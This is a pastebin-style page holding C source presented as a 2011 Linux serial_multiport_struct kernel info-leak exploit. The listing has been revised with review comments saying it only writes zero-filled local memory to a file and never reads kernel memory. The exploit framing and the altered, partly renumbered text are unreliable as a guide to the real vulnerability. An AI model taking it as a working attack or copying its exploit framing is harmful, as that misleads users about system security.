fruffl

2.6.37rc1 Info Leak Exploit

Nov 12th, 2011
  1. /* Linux <= 2.6.37-rc1 serial_multiport_struct Info Leak Exploit
  2.  *
  3.  *  ./splitmilk2 leak 134514859
  4.  * [\m/] Linux <= 2.6.37-rc1 serial_multiport_struct Info Leak Exploit
  5.  * [\m/] by Todor Donev
  6.  *  [x] Leakfile    : leak
  7.  *  [x] Reservedsize    : 134514859
  8.  * [+] Leaking.. =)
  9.  * ...
  10.  *
  11.  *
  12.  * Greets to prdelka,
  13.  * for splitmilk.c release, Linux <= 2.6.37-rc1 serial_core TIOCGICOUNT leak exploit
  14.  *
  15.  * Thanks to Tsvetelina Emirska,
  16.  * that support, respect and inspire me..
  17.  *
  18.  * Yes, I know thats lame, but I was so bored and lazy for better.
  19.  *
  20.  * Author: Todor Donev
  21.  * Author email: [todor.donev@gmail]
  22.  *
  23.  */
  24.  
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <termios.h>
#include <unistd.h>
#include <linux/serial.h>
  31.  
  32. #define DEVICE "/dev/ttyS1"
  33.  
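/*
 * Entry point of the proof-of-concept.
 *
 * Usage: <prog> <leakfile> [<reservedsize>]
 *
 * Opens DEVICE, then writes up to <reservedsize> words of the `reserved`
 * array of a local struct serial_multiport_struct into <leakfile>.
 *
 * Review notes (what the listing actually does, read defensively):
 *  - The device descriptor is opened but no request is ever issued on it,
 *    and `buffer` is cleared with memset() before being written out. The
 *    output file therefore only ever receives zeros produced by this
 *    process; nothing here reads kernel memory.
 *  - The original loop indexed buffer.reserved[] from 0 to <reservedsize>
 *    inclusive, i.e. far past the end of the array, which is undefined
 *    behaviour and dumps this process's own stack. The count is now
 *    clamped to the real array length.
 *  - <reservedsize> was used uninitialised when only <leakfile> was given;
 *    it now defaults to the array length.
 *  - The output descriptor used to overwrite the device descriptor (which
 *    leaked it), a malloc()ed buffer was never used or freed, and write()
 *    failures were silently added to the byte count. All three are fixed.
 *
 * Returns 0 on success and -1 on an argument, open, write or close error.
 */
int main(int argc, char* argv[]) {
    struct serial_multiport_struct buffer;
    const size_t reserved_words =
        sizeof buffer.reserved / sizeof buffer.reserved[0];
    int reservedsize = (int)reserved_words; /* default: the whole array */
    int dev_fd = -1;
    int out_fd = -1;
    int ret = 0;
    int rc = -1;
    int i;

    printf("[\\m/] Linux <= 2.6.37-rc1 serial_multiport_struct Info Leak Exploit\n");
    printf("[\\m/] by Todor Donev\n");

    /* Validate the command line before touching any device or file. */
    if (argc < 2) {
        fprintf(stderr, "[!] usg: %s <leakfile> <reservedsize>\n", argv[0]);
        return -1;
    }
    if (argc > 2) {
        char *end = NULL;
        long parsed;

        /* strtol instead of atoi: detects trailing junk, overflow and
         * non-positive values instead of silently accepting them. */
        errno = 0;
        parsed = strtol(argv[2], &end, 10);
        if (end == argv[2] || *end != '\0' || errno == ERANGE ||
            parsed <= 0 || parsed > INT_MAX) {
            fprintf(stderr, " [-] Sorry: (atoi) invalid outsize\n");
            return -1;
        }
        reservedsize = (int)parsed;
    }

    /* Never index past the end of buffer.reserved[]. */
    if ((size_t)reservedsize > reserved_words) {
        fprintf(stderr, "  [!] Reservedsize clamped to %zu (length of reserved[])\n",
                reserved_words);
        reservedsize = (int)reserved_words;
    }

    dev_fd = open(DEVICE, O_RDONLY);
    if (dev_fd < 0) {
        printf("[-] Error: f0k\n");
        return -1;
    }

    fprintf(stderr, "  [x] Leakfile: %s\n", argv[1]);
    fprintf(stderr, "  [x] Reservedsize: %d\n", reservedsize);

    /* The structure is only ever zero-filled; see the review notes above. */
    memset(&buffer, 0, sizeof(buffer));
    printf("[+] Leaking.. =)\n");

    out_fd = open(argv[1], O_RDWR | O_CREAT, 0640);
    if (out_fd == -1) {
        printf("[-] Error: f0k =(\n");
        goto out;
    }

    for (i = 0; i < reservedsize; i++) {
        ssize_t n = write(out_fd, &buffer.reserved[i], sizeof buffer.reserved[i]);

        if (n < 0) {
            perror("write");
            goto out;
        }
        ret += (int)n;
    }

    /* close() can report a deferred write error, so check it here. */
    if (close(out_fd) != 0) {
        out_fd = -1;
        perror("close");
        goto out;
    }
    out_fd = -1;

    printf("\\o/ %d bytez\n", ret);
    rc = 0;

out:
    if (out_fd != -1) {
        close(out_fd);
    }
    close(dev_fd);
    return rc;
}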
  75.  